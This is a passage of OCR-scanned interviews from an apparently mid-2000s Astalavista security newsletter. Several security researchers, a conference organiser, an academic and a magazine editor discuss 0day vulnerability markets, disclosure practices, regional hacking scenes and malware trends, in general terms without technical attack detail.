these issues when exploits are widely circulating. In the last year 
alone, we saw several of the Oday browser exploits incorporated into 
spyware sites within one day of their disclosure. 


Astalavista 

: Do you feel the ongoing monetization and actual development of 
security vulnerabilities market would act as an incentive for a 
ShadowCrew style underground market, whose "rewards" for Oday 
vulnerabilities will contribute to its instant monopoly? 


Dave 

: [think there will always be an underground market, but | doubt it 

will ever have a monopoly for a few reasons. We know there is a thriving 
underground market today for Odays, especially browser vulnerabilities 
that can be used to inject Trojans and steal financial data. | think the 
main obstacle currently curbing the growth of the underground 
vulnerability-purchase 


movement is a lack of trust. Since a security 

researcher doesn’t really know the identity of an underground buyer, 
there’s no guarantee he will get paid once he unveils his discovery. 
Also at the end of the day, many researchers want these vulnerabilities 
to be fixed and want to receive the appropriate recognition in the 
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mainstream security community. 


Astalavista : 

While you are currently acting as the intermediary between a vendor and 
researcher, do you picture the long-term scenario of actually bidding 

for someone else’s research given the appearance of other competitors, 
the existence of the underground market | already mentioned, and the 
transparency of both? How do you think would the market evolve? 


Dave 

: Good question. | hope the markets evolve in a way that encourages 
Vendors to put more skin in the game. It behooves these vendors to help 
protect their own customers more by rewarding outside researchers for 
security discoveries that escape internal QA testing. The only vendors | 
know of who currently do this are Netscape and Mozilla through their 
bug bounty 


programs. | think a "O-bay" auction model could be viable 

if a neutral party launched it that was trustworthy as a vulnerability 

"escrow agent" and could guarantee anonymity and payment to researchers. 

There was some good discussion on the [26]Daily Dave list of some of the issues raised by 
such an auction model. 


Astalavista 

: Should a vendor’s competencies be judged on how promptly it reacts to 
a vulnerability notification and actually provides a (working) fix? 

Moreover, should vendors be held somehow accountable for their practices 
in situations like these, thus eliminating or opening up windows of 
opportunity for pretty much anything malicious? 


Dave 

: I’ve worn the hat of a security researcher, vulnerability disclosure 
intermediary, and most recently, a vendor. | now have a great amount of 
sympathy for all three groups. In general, vendors need to make a more 
concerted effort to reach out to security researchers in the 

vulnerability disclosure process. Many vendors don’t seem to understand 
that most security researchers get no tangible benefit for reporting a 
security issue. More and more Oday disclosures it seems are also the 
result of a vendor-researcher relationship breaking down due to a 
misunderstanding over email or poor follow-up from the vendor. Ideally, 
vendors should also reward these researchers, if not with money, then 
other perks or recognition as a sign of appreciation. It’s hard to judge 
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all vendors the same on the amount of time it takes to patch a 

vulnerability. Some vulnerabilities legitimately take longer to fix and 

QA than others. Because there are no laws today that govern a vendor’s 
security response, the market is going to have to be the ultimate judge 

in this arena. If enough potential customers are lost to a competitor 

because of poor security patch handling or a destructive worm, you can 

bet that more money will be budgeted into their security development lifecycle. 


Astalavista : 

Having conducted security research for the NSA must have been quite an 
experience. Does the agency’s approach on security research somehow 
differ from the industry’s one, in terms of needs for sure, but in what 
way exactly? 


Dave : No comment :-) 


Astalavista : Can money buy creativity and innovation from an R &D’s point of view? 


Dave 

: Of course no amount of money can buy your way to really innovative 
research.Some of the most prolific research teams are built through 
visionary research directors creating a nurturing and non-restrictive 
environment, insulating the team from most corporate pressures and 
politics. 


Astalavista : Thanks for your time! 


Interview with Viadimir, aka 3APA3A [27 ]http://www.security.nnov.ru/ 


Astalavista 

: Hi Vladimir, would you please introduce yourself to our readers, and 
share some info on your background and experience with information 
security? 
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Vladimir : OK. I’m 31, I’m married, 

and we have two daughters. For last 10 years I’m support service head 
for middle sized ISP in Nizhny Novgorod, Russia. As so, I’m not occupied 
in IT security industry and I’m not security professional. It’s just a 

kind of useful hobby. And that’s the reason why | use nickname though | 
have no relation to any illegal activity. Everyone who is interested can 
easily find my real name. In addition to my primary 


job, | give few classes a week on computer science in Nizhny Novgorod State Univer- 
sity. 


| 

started on the Russian scene in the late 90s with the article on HTTP 

chats security. ’Cross site scripting’ was quite new vulnerability class 

and the term itself arrived few years after. Later | began to 

publish some articles on the Bugtraq. Because my previous nickname taken 
from Pushkin’s personage was not understandable abroad, | used gamer’s 
nick ’"3APA3A’, ‘zaraza’ in Cyrillic, it means infection. It also has a 

meaning of English ‘swine’ :). No, there is no relation with famous 

3APA3A. ZARAZA virus, it was few years before. 


I’m not ’bug 

digger’, as one may think. Some bugs were discovered in the process of 
troubleshooting, while others were found in attempt to discover new 
vulnerability class or exploitation approach. And I’m proud to catch a 
few :) 


Astalavista : What are some of your current and future projects? 


Viadimir : Since 1999 [28]http://www.security.nnov.ru 


is the only project I’m constantly involved in. Sometimes, | patch old bugs and create 
new ones within 3proxy [29 ]http://www.security.nnov.ru/soft/3proxy/ . 


Astalavista 

: How would you describe the current state of the Russian security 
scene? Also, what are you comments on the overall bad PR for, both, 
Russia, and Eastern Europe as a hackers’ haven? 


170 


Vladimir 

: "hack" is an opposite to technology for me. The industry with 
technology is a conveyor, while the hack works only here and now. 
Hacking is the process of creating something to solve one particular 
problem without enough money, resources and, most important, without 
knowledge. In the best case it’s something new for everyone and nobody 
to share knowledge and resources with you. 


If you mean a lack of money, resources and knowledge - yes, Russia is hackers’ heaven 


:) 


We 

had interesting discussion on this topic with David Endler (from your 
Newsletter #23) Of cause you know how many viruses originated from 
Russia and you know some "famous" virus writing teams. Do you know any 
software written here? Well.. may be after some research you can find 
Outpost and Kaspersky Antivirus you have never used... That’s all. You 
think. Lets look at the city | live. Many really interesting things from 
Quake II graphical drivers and Intel debugging and profiling tools 

to Motorola and Nortel firmware were written here. It’s not largest city 
and Russia is large country. Same goes to Eastern Europe, India and 
China. 


We have a lot of unknown programmers and few famous virus writers, that’s the prob- 
lem :) 


The 

security scene in Russia is really hard question. Of course, there are 

few professionals, they are well-known buddies, who work for well-known 

companies. They publish their really useful books and write their really 

professional articles and receive their really good money. There are 

old-school hackers who do not speak Russian for few years. There are 

“underground" e-zines, none of them are living enough to spell 

correctly. There are "security teams" known by defacing each over and 

publishing up to 6 bugs in PHP scripts. Teenage #haxOrlng IRC channels. 

And, of cause, guys who do their business with trojans and botnets and prefer to stay invisible. 


La 


That’s all, folks. There is no scene. No place to meet each over. No Russian Defcon. 


Astalavista 
: What are the most significant trends that happened with vulnerability 
researching as a whole since you’ve started your project? 


Vladimir 

: Any new technology arrives as a hack, but grows into industry. It was 
with computers, software, network security and finally it happens with 
vulnerability research. This fact changes everything. No place left for 
real hacking. The guys on this scene became professionals. If you enter 
this without knowledge, all you can is to find some bugs in unknown PHP 
scripts. 


Astalavista : Do you think a huge 

percentage of today’s Internet threats are mainly posed by the great 
deal of window of vulnerabilities out there, and how should we respond 
to the concept of Oday by itself? Patching is definitely not worth it on 
certain occasions from my point of view! 


Vladimir 

: Imagine a 100,000,000 of purely patched default configuration Fedora 
Core machines with users running their Mozilla’s from root account. 

That’s what we have in Windows world. Did you know that, 99 % of Windows 
trojans/viruses/backdoors will not work if executed from unprivileged 
account? Life could be much more secure if only administrator with 

special license (like driver’s one) might configure system and get 

penalties in case of virus incidents :) 


Did you know that, most 

ISPs do not monitor suspicious activity from their customers and can not 
stop attack from their network within 24 hours? It’s almost impossible 
to coordinate something between providers. There are non-formal 
organizations, like NSP-SEC, but it only 


coordinates large providers from few countries. Coordination and short abuse response 
time 


would be another step. 
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Astalavista 
: What is your attitude towards an Obay market for software 
vulnerabilities? And who wins and who loses from your point of view? 


Vladimir 

: On the real market both sides win. No doubt, the fact there is now a 
legal market for Odays is a good news for researches and end users, 
because it rises vulnerability price and establishes some standards. 
This "white" market is in it’s beginning. There are only few players. 


Who 

can value Oday Internet Explorer bug? First of all, Microsoft. But for 
some reason it does not. The second, IDS/IPS vendors and security 
consulting companies to make signatures and PR. Bugtraq posting is 
really good PR. If vulnerability is then exploited in-the-wild, it 

raises the article in Washington Post. It’s even better PR. 


Astalavista 


: Do you also, somehow picture a centralized underground ecosystem, the 


way we are currently seeing/intercepting exchange of Oday 
vulnerabilities on IRC channels, web forums. But one with better 
transparency of its content, sellers and buyers? 


Viadimir 

: And, of cause, underground market is always ready to pay. Exploits 
are required to install a trojan. Trojan is required to create a botnet. 
Botnet is required for spamming, DDoS and blackmailing, phishing, 
illegal content hosting. It’s definitely a kind of ecosystem with 
different roles and specializations and it’s money cycle as a basement. 


With 

some dirty games with Oday Internet Explorer vulnerability you can make 
a new car on the botnet market or (and?) just few thousands dollars 

with PR. Underground market is not 


centralized and lies on private 
contacts. Forums and IRC channels you can find are the top of the 
iceberg. It makes it less vulnerable. | bet last WMF exploit was sold 
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without any IRC channels and forums. 


Astalavista : Can there ever be a responsible disclosure, and ow do you picture it? 


Vladimir 

: According to Russian legislation, a vendor may not sell roduct 

without informing customer about any known defect or imitation on it. | 
bet different countries have similar legislations. | don’t understand 

why it doesn’t work with computer software. Vendor should either timely 
inform customers on defect in software or should stop to sell it. 


Of 

cause, disclosing information without informing vendor is just stupid 
and non-profitable for everyone. From other side, a vendor has not 
eliminated vulnerability after few months and has 


not informed 

customers there is nothing non-responsible in publishing this 

information. | never saw vendor who blames esearchers in non-responsible 
disclosure to stop selling defective product. 


There were few attempts to standardize disclosure policy, FPolicy is the first one. 


Astalavista : Can a vulnerability researcher gets evil if not reated properly, and what 
could follow? :) 


Vladimir 

: Sure. Imagine a situation you want to get money rom vendor for 
vulnerability information you discovered. There is nothing bad in 
getting money for your work and 


vendor should be interested in buying 
this information on the irst place. But it can be just a blackmail if 
not "treated properly". 


Astalavista : In 
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conclusion, | wanted to ask on some of your uture predictions for 2006 
concerning vulnerability research, nd the industry as a whole? 


Vladimir 

: One year is small period. Maybe we will see endors to buy 
vulnerabilities. "Vulnerability researcher" ay be scripted on somebody’s 
business card and become profession by this way. "Vulnerability 
researching" as University course... No, let’s wait for another 2-3 

years :) 


Astalavista : Thank you for your time! 
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2.1.35 Security Interviews 2004/2005 - Part 2 (2006-01-26 19:31) 


Part 2 includes : 


11. Eric (SnakeByte) - [1]http://www.snake-basket.de/ - 2005 
12. Bjorn Andreasson - [2 ]http://www.warindustries.com/ - 2005 
13. Bruce - [3]http://www.dallascon.com/ - 2005 

14. Nikolay Nedyalkov - [4]http://www.iseca.org/ - 2005 

15. Roman Polesek - [5]http://www.hakin9.org/en/ - 2005 


16. John Young - [6]http://www.cryptome.org/ - 2005 


Go through [7]Part 1 and [8]Part 3 as well! 
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[9]Part of Asta’s Security Newsletter————————— 


Interview with SnakeByte (Eric), [10]http://www.snake-basket.de/ 


Astalavista : Hi Eric, would you please introduce yourself to our readers and share your 
experience in the security scene? 


Eric 

: Lam 24 years old, currently studying computer science in Darmstadt, 
Germany for quite some time now. | am mostly a lazy guy, doing whatever | 
am currently interested in. My interest in computer security started 

with viruses ( no, | never spreaded one ), which were really interesting 

back then, but nowadays every worm looks the same;( 


Astalavista 

: Things have changed much since the days of Webfringe, Progenic, 
BlackCode etc. What do you think are the main threats to security these 
days? Is it our dependece on technologies and the Internet the fact that 
it’s insecure by design or you might have something else in mind? 


Eric 

: [think security itself got a lot better since then but we have more 

dumb users who work hard to make it worse now. Most users nowadays get 
flooded with viruses and just click them, 


also the recent rise in 


phishing attacks - it’s not the box which gets attacked here, it’s the 
user. Security also got a lot more commercial. 
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Astalavista 

: What is your opinion on today’s malware and virii scene? Do you think 
that groups such as the infamous A29 have been gaining too much 
publicity? What do you think motivates virii writers and virii groups 

now in comparison to a couple of years ago? 


Eric 

: It’s 29a :) And they deserve the publicity they got. They did and are 
doing some really cool stuff. But they also were clever enough to be 
responsible with the stuff they created. About motivation for virii 
writers - it’s different for each of them, have to ask them. 


But | 
think there is a new motivation - money. Nowadays you can get paid fora 
couple of infected computers, so spammers can abuse them. 


Astalavista 

: What do you think of Symantec ? Is too much purchasing power under 
one roof going to end up badly, or eventually the whole industry is 
going to benefit from their actions? 


Eric : Sure monopolies are always bad but we get them everywhere nowadays. 


we need another revolution... 


Astalavista 

: Is the practice of employing teen virii writers possessing what is 
thought to be a "Know-how" a wise idea? Or it just promotes lack of law 
enforcement and creates ordes of source modifying or real malware 
coders? 


Eric : | dont think it is a wise idea at 
all, but don’t tell my boss ;-) Whether one has written virii or not 
should not influence your decision to you hire him/her. 


Astalavista 
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Maybe 


: Application security has gained much attention lately. Since you have 
significant programming experience, what do you think would be the 
trends in this field over the next couple of years, would software be 
indeed coded more securely? 


Eric : Maybe, if 

universities started to teach coding in a secure way instead of teaching 
us more java bullcrap. But | think the open source development is 
indeed helpful there. If you want to 


run something like a server, a 
quick glance at the code will tell you whether you really want to use 
this piece or search for another one. 


Astalavista 
: Microsoft and its efforts to fight spyware has sparckled a huge 
debate over the Internet. Do you think it’s somehow ironic that MS’s IE 


is the number one reason for the existence of spyware. Would we see yet 


another industry build on MS’s insecurities? 


Eric : It’s the only reasonable way for MS to react. Heh, they are just a company. 


Astalavista 


: The Googlemania is still pretty hot. Are you somehow concerned about 


their one-page privacy policy, contradictive statements, and the lack of 
retention policies given the fact that they process the world’s 

searches in the most advanced way and the U.S post 9/11 Internet 
wiretapping initiatives? 


Eric : Yes | am, that’s why their only product | use is the websearch function. 


as | find another good website like google. 


Astalavista: Thanks for your time Eric! 


As soon 
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Interview with Bjorn Andreasson, [11 ]http://www.warindustries.com/ 


Astalavista : Hi Bjorn, would you please introducte yourself and share some more infor- 
mation about your background in the security world? 


Bjorn 

: My name is Bjorn "phonic" Andreasson and | live in Sweden, I’m 
turning 22 this year. I’ve been a part of the so called "underground" 
since the age of 14 which gives a total of 8 years. | got my first 
computer at the age of 13 and | quickly got involved in Warez as my 
uncle showed me some basic stuff about the internet. After a while | 
realised Warez websites was "uncool" because of all the popups, porn 
ads, only trying to get as many clicks on your ads as possible to earn 
enough money to cover your phone bill. So, there | was viewing the 
Fringe of the web (www.webfringe.com) and | found all those wonderful 
h/p/v/c/a websites, which caught my eye. | knew | could do better than 
most of these guys as | had a lot of experience from the Warez scene -| 
knew how to attract visitors quickly. The first version of War 

Industries | belive was a total ripoff from Warforge.com as | didn’t 
know better at the age of 15/16, | quickly understood this wasn’t the 
way to do it so | made my first version of the War Industries and | 
might add it looked VERY ugly as | recall it:) 


From there | have 

had several designers making new versions, trying to improve it and | 
belive we’ve acheived that goal now. It should be mentioned that during 
2000 and 2003 War Industries was put on ice as | couldn’t cover the 
expenses so it was only me and a friend keeping the name alive until 
2003 when | relaunched the website and turned it into what it is today 
(Badass). I’ve also been a part of the Progenic.com crew as well. As 
Blackcode.com crew, it was practicly my work that made BC famous because 
| sent a shitload of hits to it back in ’99 when WarlIndustries received 
4,000 unique hits on a daily basis. | also owned www.icqwar.com which 
held only ICQ war tools, some of my own creation, very basic but handy. 
The site had 3,000 unique hits on a daily basis after only one week 
online. After four weeks | got a letter from AOL to give me the domain 
name or being sued. What could | do? 16 years old, of course, | gave it 
away! Well that’s pretty much my story. 


Astalavista : Warlndustries.com has been around since 1998, nice to see that it’s still 
alive. 
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What 
is the site’s mission, is it hacking or security oriented? Shall we 
expect some quality stuff to be released in the future, too? 


Bjorn 

: WarlIndustries can’t really be placed anywhere. It’s either black, 

gray or white hat. I’d say we’re a mix with a touch of them all. Our 
focus is to enlighten people in the means of programming, getting them 
to know google as their best friend. We’ve released a couple of video 
tutorials wich are very popular because they make things so easy. We’re 
going to release a 


couple of new ones soon, as soon as we get around 

to it as most of us got jobs and other stuff to attend to. Don’t miss 

out on our brand new T-shirts coming up in a month! If you’re something, 
you've got to have one of those! 


Astalavista : 

What do you think has changed during all these years? Give a comparison 
between the scene back in 1998 as you knew it and today’s global 
security industry, and is there a scene to talk about? 


Bjorn 

: I'd say people are a way more enlightened today. Back in '98 you 

could pretty much do anything you liked without getting caught. Today 
you can’t even download Warez without getting problems. I’d say there’s a 
scene but very different from the oldschool | know. | am trying not to 

get involved and | have my own way. Maybe that’s why Warlndustries is so 
popular. 


Astalavista : Is Google evil, or let’s 
put it this way, how can Google be evil? Why would Google want to be 
evil and what can we do about it if it starts getting too evil? 


Bjorn : Google is not evil, Google is your best friend! 


Astalavista 
: Give your comments on Microsoft’s security ambitions given the fact 


181 


that they’ve recently started competing in the anti-virus industry. They 
even introduced anti-spyware application - all this comming from MS? 


Bjorn 

: If it wasn’t for Microsoft, there wouldn’t be viruses so I’m blaiming 

them for writing crap software. Why do they always leave a project 
unfinished and start another one? | mean Windows XP is working fine, why 
Longhorn? Why can’t they make XP totally secure, like OpenBSD, there 
hasn't been a remote root exploit for many years as of what I’ve heard? 
That’s security! If | didn’t know better, I’d say MS is writing 

low-quality software so they can get 


into the Anti-virus scene and make even more profits! 


Astalavista 
: Recently, the EU has been actively debating software patents. Share 
your thoughts on this and the future of open-source software? 


Bjorn 

: |can’t make up my mind when it comes to Open/Closed source.There’s 
benefits from both sides. Open source is fixed much quicker but also 
discovered way more often than closed. This is my opinion. 


Astalavista 

: In conclusion, | would really appreciate if you share your comments 
about the Astalavista.com site and, particularly, about our security 
newsletter? 


Bjorn : Actually, | haven’t checked 
out Astalavista that much. | have known it for many years but | never 
got around. | promise I'll check it out! 


Astalavista : Thanks for your time Bjorn! 
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Interview with Bruce, [12 ]http://www.dallascon.com/ 


Astalavista 

: Hi Bruce, would you please share with us some more information on 
your background in the security industry and what is DallasCon 2005 all 
about? 


Bruce : Thanks for this opportunity. | 

have over 7 years of engineering experience working as a System’s 
Engineer for companies such as Nortel Networks and Fujitsu. Realizing 
the importance of real information security training experince for 
everyday people, about 4 years ago a few colleagues and | decided to 
start truely academic Information Security Conference in Dallas and see 
what happens. We held the first DallasCon in 2002, just a few months 
after the tragic events of Septmber 11, 2001 in the U.S. The reponse was 
overwhelming with academic papers being presented from as far away as 
Russia and attending coming from countries such as Japan and China. 
Astalavista : There are so many active security cons and conferences out 
there that it is sometimes hard to decide which one is worth visiting. 
What, in your opinion, makes a con/conference qualified? Do you think 
that although there’s nothing wrong with commercialization, some cons 
are becoming too commercial so they have lost sight of what their vision 
used to be in the very beginning of their history? 


Bruce 

: Truly, | must admit the lure of money being thrown at many of similar 
conferneces such as ours is sometimes overwhelming. When a company such 
as Microsoft comes knocking on your door with a fist full of cash 

wanting to by into a Keynote speaker slot, it’s hard to resist the 
temptation to give in. But we have tried to separate the academics from 
the commercial side. The training courses and the conference itself are 
designed to present the latest unbiased view of current trends in 
information security. We have a team of dedicated colleagues that read 
every paper carefully and look for flagrant promotions of certain 
technologies or companies. They also work very closely with the speakers 
who are chosen to present at DallasCon, to make 


sure that they know 

what is expected from them. We do offer sponsorship opportunites to 
companies to help us carry the costs of such an event, but we try very 
hard to separate the business side from what people come to DallasCon 
for, which is the latest unbiased view of the trends and research in 
information security. | think many conferneces lose sight of what made 
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them big and forget their roots. 


Astalavista 

: Like pretty much every organization, ChoicePoint or T-Mobile, keep a 

great deal of personal, often sensitive information about us, as 

citizens, students or employees. What actions do you think should be 

taken by the general public, the companies themselves and the government 
to ensure that the security within such databases or service providers 

is well beyond the acceptable level of security for most organizations? 


Bruce 

: | think companies need to stop treating their customers like numbers 

and really put a face with the information that they are gathering. When 
someone gives you detailed information about themselves, they have put 
their trust in your company to protect them. When a breach is made, the 
cusomter feels betrayed and may never come back to you to do business. | 
laugh when | hear that huge muti-billion dollar companies are 

constantly having their cusotmer data stolen. | wonder how much they are 
really spending on security? How much are their cusotmers worth to 
them? These days it is hard to distinguish between legitiamte companies 
and fake ones online. It’s funny, but people have trouble revealing 

their credit card information or social security number to a physical 
business down the street, but put the same business online and people 
throw that information at you without thinking twice. | think consumers 
need to stop taking security for granted and use some common sense. The 
first step of security is common sense...You can’t put a price on that! 


Astalavista : Two words - Symbian and malware - what are your assumptions for the fu- 
ture trends on the mobile malware front? 


Bruce 

: | predict that it will be huge. The future of mobile OS is wide open 

and as the competition for market share grows, mobile companies want to 
offer anything they can in a smart-phone. | am always surprised as to 
what phones can do right now... in a few years, they might even serve us 
breakfast in bed! The downside is the huge vulnerability of the 
mobile-OS. First of all, more people own phones than computers around 
the world. It is the obvious next frontier for virus writers. Secondly, 
theoretically, it is much easier to infect an entire phone network than 
PC’s. All you need is one infected phone syncking with a base station. 
Again, | go back to my previous answer, people need to use common 
sense... Do you really need to put your financial data or your sensitive 
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e-mail on your phone? 


Astalavista : What is your opinion about the mass introduction of biometrics on a world 


wide scale? 


Bruce 

: Good - it will make security more individualized. We will all carry 
our security inside our DNA. Bad - it might increase the market for 
organ theft! (just kidding!) 


Astalavista : In 
conclusion, | would appreciate if you share your comments about the 
Astalavista.com site, and particularly about this security publication? 


Bruce : | have been visiting Astalavista.com for many years now, and | am very 


impressed 

with the up to date cutting edge news, articles and really underground 
topics covered on your site. When we wanted to really reach out to the 
educated hacker community, Astalavista.com was the obvious choice. 
Thanks for putting us on your site and thanks for helping us promote our 
event. 


Astalavista : You’re welcome, wish you luck with the con! 


Interview with Nicolay Nedyalkov, [13 ]http://www.iseca.org/ 


Astalavista 

: Hi Nicolay, would you, please, introduce yourself to our readers and 
share some info about your experience in the information security 
industry? Also what is ISECA all about? 
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Nicolay : 

My interest in information security dates back from 1996. At that time, 
respected Bulgarian experts from all over the country used to meet 
periodically at closed seminars where we exchanged our ideas and 
experience. At a later stage we developed the phreedom.org E-zine. | 
have also participated in numerous national and international 
mathematics and IT contests. 


Currently | am a managing director 

for the R &D; department of one of Bulgaria’s most Prominent IT 
companies - Information Service. In 2002 | decided to initiate an 

InfoSec course at the University of Sofia. Once the course “Network 
Security? became part of the university’s curriculum, we immediately 
got the interest of over 500 students. During 2003, with the help of 
several experienced security colleagues of mine we developed another 
fresh and very useful course in “Secure programming?. Both of the 
courses fitted perfectly into the program curriculum and actually they 
attracted more students than we had expected. | am also teaching four 
other courses in Software technologies. As a whole, we contributed for 
the development of IT education in Bulgaria establishing the ISECA 
(Information Security Association), whose main purpose is to connect our 
members and inspire them to innovate, create, and enrich their personal 
knowledge, while being part of a unique community. 


Astalavista 

: Correct me if I’m wrong but I believe not many Eastern European 
universities emphasize on the practicality of their computer and network 
security courses? What are your future plans for enriching the course 
selection further, and also integrating a more practical approach into 
your curriculum ? 


Nicolay : During the last couple of years we have seen a definite slowdown in Europe regarding 


information 

security courses and programmes. Until now we have already developed 
over eight courses, including the course Information Systems Security 
Audits, which is widely applicable. Furter, there is intensive work on 

the development of a new Network & Software Security Lab. We are 

also negotiating with ABA representatives for the introduction of a 
professional certification program - “Risk Management in the Financial 
and Banking Sector? 
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In fall 2005, University of Sofia will start a specialized master Information Security Pro- 
gram, coordinated by ISECA. 


Astalavista 

: Who are the people behind ISECA, and what are the current 
local/global projects you’re working on, or intend to develop in the 
upcoming future? 


Nicolay : Our core members 

include certified security consultants and auditors, researchers, IS 
managers and class teaching professors. Among the key projects we’ve 
already developed or we are working on at the moment are: 


- A National Laboratory for Network and Software Audits, being developed in close coop- 
eration 


with The University of Sofia. The lab will be used for audits and R &D; in the industry. 
- An Information Security Portal - ISECA 


- A National anti-spam system and its integration within international ones like Spam- 
House 


- Safeguarding the local business interests of information security and promoting its de- 
velopment on a government level 


- Active participation in the development of the Bulgarian Law for E-trade and E-signature 
- Subscription based “Vulnerability Notification? service 


- Centralized log analysis and security monitoring 


Astalavista 

: What is the current situation of the Bulgarian IT and Security 
market? What was it like 5 years ago, and is there an active security 
scene in the country? 


Nicolay : We are currently 
witnessing a boom in the Bulgarian demand for information security 
services as a great number of businesses are realizing the importance of 
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information security. On the other hand we are in a process of building 
strategical relationships with Bulgarian and multinational companies 
providing security related products and services. In the last couple of 
years official government bodies also have emphasized on sustaining 
secure communications. In response, our main goal in the upcoming future 
would be to build a collaborative working atmosphere with stable 
relationships between key partners and experts 


Astalavista : Bulgaria and Eastern Europe have always been famous as a place where 
the 


first 

computer viruses actually originated, to name the Dark Avenger as the 
most famous author. What do you think caused this - plain curiosity, 
outstanding programming skills, or you might have something else in 
mind? 


Nicolay: It is a fact that Bulgaria is 

popular with its potential in the creation of viruses, trojans and 

malware at all. The thing is that there are a great number of highly 
skilled experts, who cannot apply their talent in the still growing 

local market; consequently they sometimes switch to the dark side. One 
of our main aims is namely to attract people with great potential and 
provide them with a professional and stable basis, on which they could 
develop themselves on the right track. The Bulgarian - Dark Avenger, 
well, he used to be an idol for the virus writers and the name still 

brings respect. 


Astalavista : Is there an 

open-source scene in Bulgaria, how mature is it, and do you believe the 
country would be among the many other actively adopting open-source 
solutions in the future, for various government or nation’s purposes? 


Nicolay : Yes, there is a [14]Free Software Society . Several municipalities have already 


turned 

into E-municipalities with the help of open source software. There was a 
proposition for the introduction of a law for integrating open source 
software within the government’s administration, which was unfortunately 
rejected later on. Free Software Society is in close contact with 

various political movements, which reflects the overall support and 
understanding of open source from the society. The use of open source is 
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also within the objectives of one of the main political parties in the 
country, a goal that resulted from the many initiatives undertaken by 
the Free Software Society. ISECA’s members are also active participants 
in the core direction of the FSS. We are currently developing a new 
opensource research team, part of Information Service - OSRT 
(Open-Source Research Team). 


Astalavista : How 

skilled is the Bulgarian IT labor market and do you think there’s a 
shortage of well - trained specialists in both IT and Information 
Security? How can this be tackled? 


Nicolay : There are a great number of highly qualified software developers in Bulgaria, 
who created the [15]Bulgarian Association for Software Developers. We have had numerous 
seminars and lectures between ISECA and the Association. One of our main objectives is 
namely to locate 


and 

unite the highly qualified IT and Security experts within Bulgaria. 

Both organizations are constantly seeking to establish stable relations 
with international organizations with the idea to exchange experience 
and promote mutually beneficial partnerships. 


Astalavista : India is among the well-known outsourcing countries for various IT 


skills, 

while on the other hand the Bulgarian programmers are well- respected 
all over the world, winning international math and programming contests. 
Do you think an intangible asset like this should be taken more 

seriously by the Bulgarian Government, and what do you think would be 
the future trends? 


Nicolay : Every year there is 

a leakage of highly qualitfied young professionals with great potential 
for growth, looking for further career development . The core reason 
for this “brainwave?, so painful for the Bulgharian econmy and society, 
is the lack of a relevant government policy, ensuring stable and 
beneficial career opportunities for the young generation. | honestly 
hope that further government policies, not only those related to the IT 
industry, would be successful in providing what a nation needs - a 
bright future for its brightest minds. 


189 


Astalavista : In conclusion, | wanted to ask you what is your opinion of the Astalavista.com’s 
web site and, in particular, our security newsletter? 


Nicolay 

: [have been visiting Astalavista.com since its early days and it is 

great to see that recently the portal has successfully established among 
the few serious and comprehensive sites. Furthermore, you can always 
find whatever you are looking for - software, as well as recommendations 
and shared experience in information security. | believe Bulgaria needs 
the same high quality portal, one of our main ideas behind ISECA. 


Astalavista : Thanks for your time! 


Interview with Roman Polesek, [16]http://www.hakin9.org/ 


Astalavista 

: Hi Roman, would you please introduce yourself, share some info about 
your background in the security industry, and tell us what is Hakin9 all 
about? 


Roman : My name is Roman Polesek, | am an editor-in-chief of the ’[17]hakin9 
- practical protection’ magazine since Summer of 2004. I’m 27 years old 

if it does matter. This might be a bit surprising for folks who know 

our magazine well, but I’m more a journalist/editor (and that is my 

education) than a CS/security master. Of course, | worked as a sysadmin 

for some time, 


use mainly Unices and code in several languages, but 

in the IT industry world I’m rather a self made man. | suppose | have no 
right to call myself "[18]a hacker" 

in the proper meaning of the word. In short, hakin9’ - subtitled as 
"Hard Core IT Security Magazine" - aims to be a perfect source of 
strictly technical, IT security related quality information. We noticed 
that both the market and the community lack comprehensive, in-depth 
works on this topic. Decision was pretty simple: "Let’s do it and let’s 

do it good - we cannot fail". At the moment, with total circulation of 
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nearly 50 thousand copies, we have 7 language versions. The magazine is 
available worldwide, by subscription or in distribution. However, it’s 
important to remember that we are not encouraging anyone to commit any 
criminal acts. Beside disclaimers published in every issue of the mag, 

we emphasize on the legal matters wherever possible. We do not want to 
make a magazine for the so-called script-kiddies and assume that our 
readers are professionals and require some portion of knowledge to fully 
utilize magazine’s content. On the other hand, as we all know, "The 
information wants to be free". 


There’s no reason to avoid any particular 

subjects. Every article that precisely describes an attack technique 
includes a section that is to help defending from the threat we present. 
‘hakin9’ is not only a magazine. The free cover CD is attached to every 
hardcopy. The disc includes a live Linux distribution called [19]’hakin9.live’ along 
with plenty of useful documentation [RFCs, FYIs, HOWTOs] and a really 
huge amount of computer/network security applications. We also prepare 
our own tutorials that allow readers to exercise the techniques 

described in articles [only in their very own networks!]. Since the next 
issue of ’hakin9’, the CD will also contain full versions of commercial 
applications for Windows. Athough we rarely use Microsoft Windows, we 
consider it useful and some of the readers requested such software. One 
of the articles from each issue is available for free, just to make sure 
anyone that buys ‘hakin9’ won’t regret the purchase. See our website if 
you're interested in trying ‘hakin9’ articles. 


Astalavista : What do you think are the critical success factors for a security oriented 
hard cover magazine? 


Roman 

: lam convinced that the crucial matter is honesty. Our target readers 
are highly educated, extremely intelligent people and would easily 
recognize any marketing lies. We just do not say things that aren’t 
true. Everyone can see what we publish and how we do it. The other 
important thing is diversity. It’s obvious that creating a magazine that 
fits everybody is impossible. There will always be a guy that is not 
satisfied with, say, the cover story or the layout or anything else. 
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This is nothing unusual, but should be expressed loud and 


clear. 

That’s why we cover different topics - from e.g. attacks on Bluetooth 

stack, through data recovery in Linux or anti-cracking techniques for 
Windows programmers to methods of compromising EM emissions. Last but 
not least, the mother of all successes is making 


people aware of 

magazines’ existence. Nobody would buy ‘hakin9’ unless they know we are 
available. But the main thing is that magazines like ours will never be 
mass publications, they have their niche that needs to be cultivated. 

The general rule - for all press publishers, not only us - is "Respect 

your readers and they will respect you". Selling many copies of one 

issue, using lies and misleading information, is not difficult. What’s 

difficult is to make sure that users will consider you a professional 

who just makes a good magazine, not a travelling agent. 


Astalavista 

: What is the current situation on Poland’s IT and Security scene, and 
do you think it’s developing in the right direction from your point of 
view, beside Poland’s obvious anti-software patents policy? 


Roman 

: Yes, "Thank you Poland" and all. It’s always nice to know that 
someone in the world has positive connotations with your country. But | 
cannot give you any general overview of the Polish scene. It’s just too 
diverse and | work with IT specialists from all over the world, so | do 
not concentrate on Poland particularly. After all, most of the important 
things happen in the USA. Really, the main problem in Poland is 
software piracy. I’m not talking about P2P networks specifically, I’m 
talking about the consciousness of Polish people. They are just not 
aware of the 


fact that using cracked apps is a crime, a pure theft. | 

suppose this problem is present in all countries. And poverty does not 
justify such a procedure at all, we have plenty of free substitutes for 
even the most popular software. The Polish scene (1 mean community by 
